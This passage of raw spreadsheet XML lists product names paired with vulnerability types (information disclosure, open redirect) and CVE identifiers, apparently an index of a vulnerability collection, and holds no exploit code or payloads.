        <v>1644</v>
      </c>
    </row>
    <row r="488" s="4" customFormat="1" spans="1:6">
      <c r="A488" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B488" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C488" s="2" t="s">
        <v>1645</v>
      </c>
      <c r="D488" s="2" t="str">
        <f t="shared" si="7"/>
        <v>WordPress_信息泄露_CVE-2022-0594</v>
      </c>
      <c r="E488" s="6" t="s">
        <v>1646</v>
      </c>
      <c r="F488" s="4" t="s">
        <v>1647</v>
      </c>
    </row>
    <row r="489" s="4" customFormat="1" spans="1:6">
      <c r="A489" s="2" t="s">
        <v>1648</v>
      </c>
      <c r="B489" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C489" s="2" t="s">
        <v>1649</v>
      </c>
      <c r="D489" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Adlisting Classified Ads_信息泄露_CVE-2023-4168</v>
      </c>
      <c r="E489" s="6" t="s">
        <v>1650</v>
      </c>
      <c r="F489" s="4" t="s">
        <v>1651</v>
      </c>
    </row>
    <row r="490" s="4" customFormat="1" spans="1:6">
      <c r="A490" s="2" t="s">
        <v>1652</v>
      </c>
      <c r="B490" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C490" s="2" t="s">
        <v>1653</v>
      </c>
      <c r="D490" s="2" t="str">
        <f t="shared" si="7"/>
        <v>EyouCMS_信息泄露_CVE-2023-37645</v>
      </c>
      <c r="E490" s="6" t="s">
        <v>1654</v>
      </c>
      <c r="F490" s="4" t="s">
        <v>1655</v>
      </c>
    </row>
    <row r="491" s="4" customFormat="1" spans="1:6">
      <c r="A491" s="2" t="s">
        <v>1656</v>
      </c>
      <c r="B491" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C491" s="2" t="s">
        <v>1657</v>
      </c>
      <c r="D491" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Milesight Routers_信息泄露_CVE-2023-43261</v>
      </c>
      <c r="E491" s="6" t="s">
        <v>1658</v>
      </c>
      <c r="F491" s="4" t="s">
        <v>1659</v>
      </c>
    </row>
    <row r="492" s="4" customFormat="1" spans="1:6">
      <c r="A492" s="2" t="s">
        <v>241</v>
      </c>
      <c r="B492" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C492" s="2" t="s">
        <v>1660</v>
      </c>
      <c r="D492" s="2" t="str">
        <f t="shared" si="7"/>
        <v>泛微_信息泄露_CVE-2023-2766</v>
      </c>
      <c r="E492" s="6" t="s">
        <v>1661</v>
      </c>
      <c r="F492" s="4" t="s">
        <v>1662</v>
      </c>
    </row>
    <row r="493" s="4" customFormat="1" spans="1:6">
      <c r="A493" s="2" t="s">
        <v>566</v>
      </c>
      <c r="B493" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C493" s="2" t="s">
        <v>1663</v>
      </c>
      <c r="D493" s="2" t="str">
        <f t="shared" si="7"/>
        <v>XWiki_信息泄露_CVE-2023-48241</v>
      </c>
      <c r="E493" s="6" t="s">
        <v>1664</v>
      </c>
      <c r="F493" s="4" t="s">
        <v>1665</v>
      </c>
    </row>
    <row r="494" s="4" customFormat="1" spans="1:6">
      <c r="A494" s="2" t="s">
        <v>1666</v>
      </c>
      <c r="B494" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C494" s="2" t="s">
        <v>1667</v>
      </c>
      <c r="D494" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Brother MFC_信息泄露_CVE-2024-51977</v>
      </c>
      <c r="E494" s="6" t="s">
        <v>1668</v>
      </c>
      <c r="F494" s="4" t="s">
        <v>1669</v>
      </c>
    </row>
    <row r="495" s="4" customFormat="1" spans="1:6">
      <c r="A495" s="2" t="s">
        <v>1670</v>
      </c>
      <c r="B495" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C495" s="2" t="s">
        <v>1671</v>
      </c>
      <c r="D495" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Netgear R_信息泄露_CVE-2024-30569</v>
      </c>
      <c r="E495" s="6" t="s">
        <v>1672</v>
      </c>
      <c r="F495" s="4" t="s">
        <v>1673</v>
      </c>
    </row>
    <row r="496" s="4" customFormat="1" spans="1:6">
      <c r="A496" s="2" t="s">
        <v>1674</v>
      </c>
      <c r="B496" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C496" s="2" t="s">
        <v>1675</v>
      </c>
      <c r="D496" s="2" t="str">
        <f t="shared" si="7"/>
        <v>iTop Hub Connector_信息泄露_CVE-2024-32870</v>
      </c>
      <c r="E496" s="6" t="s">
        <v>1676</v>
      </c>
      <c r="F496" s="4" t="s">
        <v>1677</v>
      </c>
    </row>
    <row r="497" s="4" customFormat="1" spans="1:6">
      <c r="A497" s="2" t="s">
        <v>1678</v>
      </c>
      <c r="B497" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C497" s="2"/>
      <c r="D497" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Phinx _信息泄露</v>
      </c>
      <c r="E497" s="6" t="s">
        <v>1679</v>
      </c>
      <c r="F497" s="4" t="s">
        <v>1680</v>
      </c>
    </row>
    <row r="498" s="4" customFormat="1" spans="1:6">
      <c r="A498" s="2" t="s">
        <v>1681</v>
      </c>
      <c r="B498" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C498" s="2"/>
      <c r="D498" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Psalm _信息泄露</v>
      </c>
      <c r="E498" s="6" t="s">
        <v>1682</v>
      </c>
      <c r="F498" s="4" t="s">
        <v>1683</v>
      </c>
    </row>
    <row r="499" s="4" customFormat="1" spans="1:6">
      <c r="A499" s="2" t="s">
        <v>1684</v>
      </c>
      <c r="B499" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C499" s="2"/>
      <c r="D499" s="2" t="str">
        <f t="shared" si="7"/>
        <v>BitBucket Pipelines _信息泄露</v>
      </c>
      <c r="E499" s="6" t="s">
        <v>1685</v>
      </c>
      <c r="F499" s="4" t="s">
        <v>1686</v>
      </c>
    </row>
    <row r="500" s="4" customFormat="1" spans="1:6">
      <c r="A500" s="2" t="s">
        <v>241</v>
      </c>
      <c r="B500" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C500" s="2"/>
      <c r="D500" s="2" t="str">
        <f t="shared" si="7"/>
        <v>泛微_信息泄露</v>
      </c>
      <c r="E500" s="6" t="s">
        <v>1687</v>
      </c>
      <c r="F500" s="4" t="s">
        <v>1688</v>
      </c>
    </row>
    <row r="501" s="4" customFormat="1" spans="1:6">
      <c r="A501" s="2" t="s">
        <v>1689</v>
      </c>
      <c r="B501" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C501" s="2"/>
      <c r="D501" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Nacos_信息泄露</v>
      </c>
      <c r="E501" s="6" t="s">
        <v>1690</v>
      </c>
      <c r="F501" s="4" t="s">
        <v>1691</v>
      </c>
    </row>
    <row r="502" s="4" customFormat="1" spans="1:6">
      <c r="A502" s="2" t="s">
        <v>1692</v>
      </c>
      <c r="B502" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C502" s="2"/>
      <c r="D502" s="2" t="str">
        <f t="shared" si="7"/>
        <v>BSPHP_信息泄露</v>
      </c>
      <c r="E502" s="6" t="s">
        <v>1693</v>
      </c>
      <c r="F502" s="4" t="s">
        <v>1694</v>
      </c>
    </row>
    <row r="503" s="4" customFormat="1" spans="1:6">
      <c r="A503" s="2" t="s">
        <v>248</v>
      </c>
      <c r="B503" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C503" s="2"/>
      <c r="D503" s="2" t="str">
        <f t="shared" si="7"/>
        <v>用友_信息泄露</v>
      </c>
      <c r="E503" s="6" t="s">
        <v>1695</v>
      </c>
      <c r="F503" s="4" t="s">
        <v>1696</v>
      </c>
    </row>
    <row r="504" s="4" customFormat="1" spans="1:6">
      <c r="A504" s="2" t="s">
        <v>721</v>
      </c>
      <c r="B504" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C504" s="2" t="s">
        <v>1697</v>
      </c>
      <c r="D504" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Cisco_信息泄露_CVE-2024-20440</v>
      </c>
      <c r="E504" s="6" t="s">
        <v>1698</v>
      </c>
      <c r="F504" s="4" t="s">
        <v>1699</v>
      </c>
    </row>
    <row r="505" s="4" customFormat="1" spans="1:6">
      <c r="A505" s="2" t="s">
        <v>1700</v>
      </c>
      <c r="B505" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C505" s="2" t="s">
        <v>1701</v>
      </c>
      <c r="D505" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Grafana钉钉API_信息泄露_CVE-2025-3415</v>
      </c>
      <c r="E505" s="6" t="s">
        <v>1702</v>
      </c>
      <c r="F505" s="4" t="s">
        <v>1703</v>
      </c>
    </row>
    <row r="506" s="4" customFormat="1" spans="1:6">
      <c r="A506" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B506" s="2" t="s">
        <v>1582</v>
      </c>
      <c r="C506" s="2" t="s">
        <v>256</v>
      </c>
      <c r="D506" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Joomla_信息泄露</v>
      </c>
      <c r="E506" s="6" t="s">
        <v>1704</v>
      </c>
      <c r="F506" s="4" t="s">
        <v>1705</v>
      </c>
    </row>
    <row r="507" s="4" customFormat="1" spans="1:6">
      <c r="A507" s="2" t="s">
        <v>1706</v>
      </c>
      <c r="B507" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C507" s="2" t="s">
        <v>1708</v>
      </c>
      <c r="D507" s="2" t="str">
        <f t="shared" si="7"/>
        <v>AWStats_开放重定向_CVE-2009-5020</v>
      </c>
      <c r="E507" s="6" t="s">
        <v>1709</v>
      </c>
      <c r="F507" s="4" t="s">
        <v>1710</v>
      </c>
    </row>
    <row r="508" s="4" customFormat="1" spans="1:6">
      <c r="A508" s="2" t="s">
        <v>1711</v>
      </c>
      <c r="B508" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C508" s="2" t="s">
        <v>1712</v>
      </c>
      <c r="D508" s="2" t="str">
        <f t="shared" si="7"/>
        <v>TikiWikiCMS Groupware_开放重定向_CVE-2012-5321</v>
      </c>
      <c r="E508" s="6" t="s">
        <v>1713</v>
      </c>
      <c r="F508" s="4" t="s">
        <v>1714</v>
      </c>
    </row>
    <row r="509" s="4" customFormat="1" spans="1:6">
      <c r="A509" s="2" t="s">
        <v>1715</v>
      </c>
      <c r="B509" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C509" s="2" t="s">
        <v>1716</v>
      </c>
      <c r="D509" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Telaen_开放重定向_CVE-2013-2621</v>
      </c>
      <c r="E509" s="6" t="s">
        <v>1717</v>
      </c>
      <c r="F509" s="4" t="s">
        <v>1718</v>
      </c>
    </row>
    <row r="510" s="4" customFormat="1" spans="1:6">
      <c r="A510" s="2" t="s">
        <v>1719</v>
      </c>
      <c r="B510" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C510" s="2" t="s">
        <v>1720</v>
      </c>
      <c r="D510" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Kaseya Virtual System Administrator_开放重定向_CVE-2015-2863</v>
      </c>
      <c r="E510" s="6" t="s">
        <v>1721</v>
      </c>
      <c r="F510" s="4" t="s">
        <v>1722</v>
      </c>
    </row>
    <row r="511" s="4" customFormat="1" spans="1:6">
      <c r="A511" s="2" t="s">
        <v>489</v>
      </c>
      <c r="B511" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C511" s="2" t="s">
        <v>1723</v>
      </c>
      <c r="D511" s="2" t="str">
        <f t="shared" si="7"/>
        <v>KenticoCMS_开放重定向_CVE-2015-7823</v>
      </c>
      <c r="E511" s="6" t="s">
        <v>1724</v>
      </c>
      <c r="F511" s="4" t="s">
        <v>1725</v>
      </c>
    </row>
    <row r="512" s="4" customFormat="1" spans="1:6">
      <c r="A512" s="2" t="s">
        <v>1726</v>
      </c>
      <c r="B512" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C512" s="2" t="s">
        <v>1727</v>
      </c>
      <c r="D512" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Novius OS_开放重定向_CVE-2015-5354</v>
      </c>
      <c r="E512" s="6" t="s">
        <v>1728</v>
      </c>
      <c r="F512" s="4" t="s">
        <v>1729</v>
      </c>
    </row>
    <row r="513" s="4" customFormat="1" spans="1:6">
      <c r="A513" s="2" t="s">
        <v>1730</v>
      </c>
      <c r="B513" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C513" s="2" t="s">
        <v>1731</v>
      </c>
      <c r="D513" s="2" t="str">
        <f t="shared" si="7"/>
        <v>Xsuite_开放重定向_CVE-2015-4668</v>
      </c>
      <c r="E513" s="6" t="s">
        <v>1732</v>
      </c>
      <c r="F513" s="4" t="s">
        <v>1733</v>
      </c>
    </row>
    <row r="514" s="4" customFormat="1" spans="1:6">
      <c r="A514" s="2" t="s">
        <v>1734</v>
      </c>
      <c r="B514" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C514" s="2" t="s">
        <v>1735</v>
      </c>
      <c r="D514" s="2" t="str">
        <f t="shared" ref="D514:D577" si="8">_xlfn.TEXTJOIN("_",TRUE,A514:C514)</f>
        <v>Odoo_开放重定向_CVE-2017-5871</v>
      </c>
      <c r="E514" s="6" t="s">
        <v>1736</v>
      </c>
      <c r="F514" s="4" t="s">
        <v>1737</v>
      </c>
    </row>
    <row r="515" s="4" customFormat="1" spans="1:6">
      <c r="A515" s="2" t="s">
        <v>1738</v>
      </c>
      <c r="B515" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C515" s="2" t="s">
        <v>1739</v>
      </c>
      <c r="D515" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Oracle _开放重定向_CVE-2017-3528</v>
      </c>
      <c r="E515" s="6" t="s">
        <v>1740</v>
      </c>
      <c r="F515" s="4" t="s">
        <v>1741</v>
      </c>
    </row>
    <row r="516" s="4" customFormat="1" spans="1:6">
      <c r="A516" s="2" t="s">
        <v>1742</v>
      </c>
      <c r="B516" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C516" s="2" t="s">
        <v>1743</v>
      </c>
      <c r="D516" s="2" t="str">
        <f t="shared" si="8"/>
        <v>DotCMS_开放重定向_CVE-2018-17422</v>
      </c>
      <c r="E516" s="6" t="s">
        <v>1744</v>
      </c>
      <c r="F516" s="4" t="s">
        <v>1745</v>
      </c>
    </row>
    <row r="517" s="4" customFormat="1" spans="1:6">
      <c r="A517" s="2" t="s">
        <v>1746</v>
      </c>
      <c r="B517" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C517" s="2" t="s">
        <v>1747</v>
      </c>
      <c r="D517" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Eventum_开放重定向_CVE-2018-16761</v>
      </c>
      <c r="E517" s="6" t="s">
        <v>1748</v>
      </c>
      <c r="F517" s="4" t="s">
        <v>1749</v>
      </c>
    </row>
    <row r="518" s="4" customFormat="1" spans="1:6">
      <c r="A518" s="2" t="s">
        <v>1750</v>
      </c>
      <c r="B518" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C518" s="2" t="s">
        <v>1751</v>
      </c>
      <c r="D518" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Seagate NAS OS_开放重定向_CVE-2018-12300</v>
      </c>
      <c r="E518" s="6" t="s">
        <v>1752</v>
      </c>
      <c r="F518" s="4" t="s">
        <v>1753</v>
      </c>
    </row>
    <row r="519" s="4" customFormat="1" spans="1:6">
      <c r="A519" s="2" t="s">
        <v>1754</v>
      </c>
      <c r="B519" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C519" s="2" t="s">
        <v>1755</v>
      </c>
      <c r="D519" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Babel_开放重定向_CVE-2019-1010290</v>
      </c>
      <c r="E519" s="6" t="s">
        <v>1756</v>
      </c>
      <c r="F519" s="4" t="s">
        <v>1757</v>
      </c>
    </row>
    <row r="520" s="4" customFormat="1" spans="1:6">
      <c r="A520" s="2" t="s">
        <v>1758</v>
      </c>
      <c r="B520" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C520" s="2" t="s">
        <v>1759</v>
      </c>
      <c r="D520" s="2" t="str">
        <f t="shared" si="8"/>
        <v>LabKey Server Community Edition_开放重定向_CVE-2019-3912</v>
      </c>
      <c r="E520" s="6" t="s">
        <v>1760</v>
      </c>
      <c r="F520" s="4" t="s">
        <v>1761</v>
      </c>
    </row>
    <row r="521" s="4" customFormat="1" spans="1:6">
      <c r="A521" s="2" t="s">
        <v>1762</v>
      </c>
      <c r="B521" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C521" s="2" t="s">
        <v>1763</v>
      </c>
      <c r="D521" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Smartstore_开放重定向_CVE-2020-36365</v>
      </c>
      <c r="E521" s="6" t="s">
        <v>1764</v>
      </c>
      <c r="F521" s="4" t="s">
        <v>1765</v>
      </c>
    </row>
    <row r="522" s="4" customFormat="1" spans="1:6">
      <c r="A522" s="2" t="s">
        <v>1766</v>
      </c>
      <c r="B522" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C522" s="2" t="s">
        <v>1767</v>
      </c>
      <c r="D522" s="2" t="str">
        <f t="shared" si="8"/>
        <v>EyouCMS Open Redirect_开放重定向_CVE-2021-39501</v>
      </c>
      <c r="E522" s="6" t="s">
        <v>1768</v>
      </c>
      <c r="F522" s="4" t="s">
        <v>1769</v>
      </c>
    </row>
    <row r="523" s="4" customFormat="1" spans="1:6">
      <c r="A523" s="2" t="s">
        <v>283</v>
      </c>
      <c r="B523" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C523" s="2" t="s">
        <v>1770</v>
      </c>
      <c r="D523" s="2" t="str">
        <f t="shared" si="8"/>
        <v>IceWarp_开放重定向_CVE-2021-36580</v>
      </c>
      <c r="E523" s="6" t="s">
        <v>1771</v>
      </c>
      <c r="F523" s="4" t="s">
        <v>1772</v>
      </c>
    </row>
    <row r="524" s="4" customFormat="1" spans="1:6">
      <c r="A524" s="2" t="s">
        <v>1773</v>
      </c>
      <c r="B524" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C524" s="2" t="s">
        <v>1774</v>
      </c>
      <c r="D524" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Noptin_开放重定向_CVE-2021-25033</v>
      </c>
      <c r="E524" s="6" t="s">
        <v>1775</v>
      </c>
      <c r="F524" s="4" t="s">
        <v>1776</v>
      </c>
    </row>
    <row r="525" s="4" customFormat="1" spans="1:6">
      <c r="A525" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B525" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C525" s="2" t="s">
        <v>1777</v>
      </c>
      <c r="D525" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向_CVE-2021-24288</v>
      </c>
      <c r="E525" s="6" t="s">
        <v>1778</v>
      </c>
      <c r="F525" s="4" t="s">
        <v>1779</v>
      </c>
    </row>
    <row r="526" s="4" customFormat="1" spans="1:6">
      <c r="A526" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B526" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C526" s="2" t="s">
        <v>1780</v>
      </c>
      <c r="D526" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向_CVE-2021-24838</v>
      </c>
      <c r="E526" s="6" t="s">
        <v>1781</v>
      </c>
      <c r="F526" s="4" t="s">
        <v>1782</v>
      </c>
    </row>
    <row r="527" s="4" customFormat="1" spans="1:6">
      <c r="A527" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B527" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C527" s="2" t="s">
        <v>1783</v>
      </c>
      <c r="D527" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向_CVE-2021-25111</v>
      </c>
      <c r="E527" s="6" t="s">
        <v>1784</v>
      </c>
      <c r="F527" s="4" t="s">
        <v>1785</v>
      </c>
    </row>
    <row r="528" s="4" customFormat="1" spans="1:6">
      <c r="A528" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B528" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C528" s="2" t="s">
        <v>1786</v>
      </c>
      <c r="D528" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向_CVE-2021-25028</v>
      </c>
      <c r="E528" s="6" t="s">
        <v>1787</v>
      </c>
      <c r="F528" s="4" t="s">
        <v>1788</v>
      </c>
    </row>
    <row r="529" s="4" customFormat="1" spans="1:6">
      <c r="A529" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B529" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C529" s="2" t="s">
        <v>1789</v>
      </c>
      <c r="D529" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向_CVE-2021-24406</v>
      </c>
      <c r="E529" s="6" t="s">
        <v>1790</v>
      </c>
      <c r="F529" s="4" t="s">
        <v>1791</v>
      </c>
    </row>
    <row r="530" s="4" customFormat="1" spans="1:6">
      <c r="A530" s="2" t="s">
        <v>1792</v>
      </c>
      <c r="B530" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C530" s="2" t="s">
        <v>1793</v>
      </c>
      <c r="D530" s="2" t="str">
        <f t="shared" si="8"/>
        <v>ILIAS eLearning_开放重定向_CVE-2022-45917</v>
      </c>
      <c r="E530" s="6" t="s">
        <v>1794</v>
      </c>
      <c r="F530" s="4" t="s">
        <v>1795</v>
      </c>
    </row>
    <row r="531" s="4" customFormat="1" spans="1:6">
      <c r="A531" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B531" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C531" s="2" t="s">
        <v>1796</v>
      </c>
      <c r="D531" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向_CVE-2022-0165</v>
      </c>
      <c r="E531" s="6" t="s">
        <v>1797</v>
      </c>
      <c r="F531" s="4" t="s">
        <v>1798</v>
      </c>
    </row>
    <row r="532" s="4" customFormat="1" spans="1:6">
      <c r="A532" s="2" t="s">
        <v>1799</v>
      </c>
      <c r="B532" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C532" s="2" t="s">
        <v>1800</v>
      </c>
      <c r="D532" s="2" t="str">
        <f t="shared" si="8"/>
        <v>BlogEngineCMS_开放重定向_CVE-2023-33405</v>
      </c>
      <c r="E532" s="6" t="s">
        <v>1801</v>
      </c>
      <c r="F532" s="4" t="s">
        <v>1802</v>
      </c>
    </row>
    <row r="533" s="4" customFormat="1" spans="1:6">
      <c r="A533" s="2" t="s">
        <v>283</v>
      </c>
      <c r="B533" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C533" s="2" t="s">
        <v>1803</v>
      </c>
      <c r="D533" s="2" t="str">
        <f t="shared" si="8"/>
        <v>IceWarp_开放重定向_CVE-2023-40779</v>
      </c>
      <c r="E533" s="6" t="s">
        <v>1804</v>
      </c>
      <c r="F533" s="4" t="s">
        <v>1805</v>
      </c>
    </row>
    <row r="534" s="4" customFormat="1" spans="1:6">
      <c r="A534" s="2" t="s">
        <v>1806</v>
      </c>
      <c r="B534" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C534" s="2" t="s">
        <v>1807</v>
      </c>
      <c r="D534" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Mosparo_开放重定向_CVE-2023-5375</v>
      </c>
      <c r="E534" s="6" t="s">
        <v>1808</v>
      </c>
      <c r="F534" s="4" t="s">
        <v>1809</v>
      </c>
    </row>
    <row r="535" s="4" customFormat="1" spans="1:6">
      <c r="A535" s="2" t="s">
        <v>1810</v>
      </c>
      <c r="B535" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C535" s="2" t="s">
        <v>1811</v>
      </c>
      <c r="D535" s="2" t="str">
        <f t="shared" si="8"/>
        <v>OpenCMS _开放重定向_CVE-2023-6380</v>
      </c>
      <c r="E535" s="6" t="s">
        <v>1812</v>
      </c>
      <c r="F535" s="4" t="s">
        <v>1813</v>
      </c>
    </row>
    <row r="536" s="4" customFormat="1" spans="1:6">
      <c r="A536" s="2" t="s">
        <v>1814</v>
      </c>
      <c r="B536" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C536" s="2" t="s">
        <v>1815</v>
      </c>
      <c r="D536" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Payment Gateway_开放重定向_CVE-2023-6786</v>
      </c>
      <c r="E536" s="6" t="s">
        <v>1816</v>
      </c>
      <c r="F536" s="4" t="s">
        <v>1817</v>
      </c>
    </row>
    <row r="537" s="4" customFormat="1" spans="1:6">
      <c r="A537" s="2" t="s">
        <v>77</v>
      </c>
      <c r="B537" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C537" s="2" t="s">
        <v>1818</v>
      </c>
      <c r="D537" s="2" t="str">
        <f t="shared" si="8"/>
        <v>WordPress_开放重定向_CVE-2023-0552</v>
      </c>
      <c r="E537" s="6" t="s">
        <v>1819</v>
      </c>
      <c r="F537" s="4" t="s">
        <v>1820</v>
      </c>
    </row>
    <row r="538" s="4" customFormat="1" spans="1:6">
      <c r="A538" s="2" t="s">
        <v>566</v>
      </c>
      <c r="B538" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C538" s="2" t="s">
        <v>1821</v>
      </c>
      <c r="D538" s="2" t="str">
        <f t="shared" si="8"/>
        <v>XWiki_开放重定向_CVE-2023-29204</v>
      </c>
      <c r="E538" s="6" t="s">
        <v>1822</v>
      </c>
      <c r="F538" s="4" t="s">
        <v>1823</v>
      </c>
    </row>
    <row r="539" s="4" customFormat="1" spans="1:6">
      <c r="A539" s="2" t="s">
        <v>1824</v>
      </c>
      <c r="B539" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C539" s="2" t="s">
        <v>1825</v>
      </c>
      <c r="D539" s="2" t="str">
        <f t="shared" si="8"/>
        <v>BentoML_开放重定向_CVE-2024-12760</v>
      </c>
      <c r="E539" s="6" t="s">
        <v>1826</v>
      </c>
      <c r="F539" s="4" t="s">
        <v>1827</v>
      </c>
    </row>
    <row r="540" s="4" customFormat="1" spans="1:6">
      <c r="A540" s="2" t="s">
        <v>1828</v>
      </c>
      <c r="B540" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C540" s="2" t="s">
        <v>1829</v>
      </c>
      <c r="D540" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Keycloak_开放重定向_CVE-2024-8883</v>
      </c>
      <c r="E540" s="6" t="s">
        <v>1830</v>
      </c>
      <c r="F540" s="4" t="s">
        <v>1831</v>
      </c>
    </row>
    <row r="541" s="4" customFormat="1" spans="1:6">
      <c r="A541" s="2" t="s">
        <v>1832</v>
      </c>
      <c r="B541" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C541" s="2" t="s">
        <v>1833</v>
      </c>
      <c r="D541" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Travelpayouts_开放重定向_CVE-2024-0337</v>
      </c>
      <c r="E541" s="6" t="s">
        <v>1834</v>
      </c>
      <c r="F541" s="4" t="s">
        <v>1835</v>
      </c>
    </row>
    <row r="542" s="4" customFormat="1" spans="1:6">
      <c r="A542" s="2" t="s">
        <v>27</v>
      </c>
      <c r="B542" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C542" s="2"/>
      <c r="D542" s="2" t="str">
        <f t="shared" si="8"/>
        <v>织梦_开放重定向</v>
      </c>
      <c r="E542" s="6" t="s">
        <v>1836</v>
      </c>
      <c r="F542" s="4" t="s">
        <v>1837</v>
      </c>
    </row>
    <row r="543" s="4" customFormat="1" spans="1:6">
      <c r="A543" s="2" t="s">
        <v>1838</v>
      </c>
      <c r="B543" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C543" s="2"/>
      <c r="D543" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Netsweeper_开放重定向</v>
      </c>
      <c r="E543" s="6" t="s">
        <v>1839</v>
      </c>
      <c r="F543" s="4" t="s">
        <v>1840</v>
      </c>
    </row>
    <row r="544" s="4" customFormat="1" spans="1:6">
      <c r="A544" s="2" t="s">
        <v>1841</v>
      </c>
      <c r="B544" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C544" s="2"/>
      <c r="D544" s="2" t="str">
        <f t="shared" si="8"/>
        <v>HomeAutomation_开放重定向</v>
      </c>
      <c r="E544" s="6" t="s">
        <v>1842</v>
      </c>
      <c r="F544" s="4" t="s">
        <v>1843</v>
      </c>
    </row>
    <row r="545" s="4" customFormat="1" spans="1:6">
      <c r="A545" s="2" t="s">
        <v>1243</v>
      </c>
      <c r="B545" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C545" s="2"/>
      <c r="D545" s="2" t="str">
        <f t="shared" si="8"/>
        <v>Next_开放重定向</v>
      </c>
      <c r="E545" s="6" t="s">
        <v>1844</v>
      </c>
      <c r="F545" s="4" t="s">
        <v>1845</v>
      </c>
    </row>
    <row r="546" s="4" customFormat="1" spans="1:6">
      <c r="A546" s="2" t="s">
        <v>1846</v>
      </c>
      <c r="B546" s="2" t="s">
        <v>1707</v>
      </c>
      <c r="C546" s="2"/>
      <c r="D546" s="2" t="str">
        <f t="shared" si="8"/>
        <v>OdooCMS_开放重定向</v>
      </c>
      <c r="E546" s="6" t="s">
        <v>1847</v>
      </c>
      <c r="F546" s="4" t="s">
        <v>1848</v>
      </c>
    </row>
    <row r="547" s="4" customFormat="1" spans="1:6">
      <c r="A547" s="2" t="s">
        <v>1849</v>
      </c>
      <c r="B547" s="2" t="s">
        <v>1707</v>
      </c>
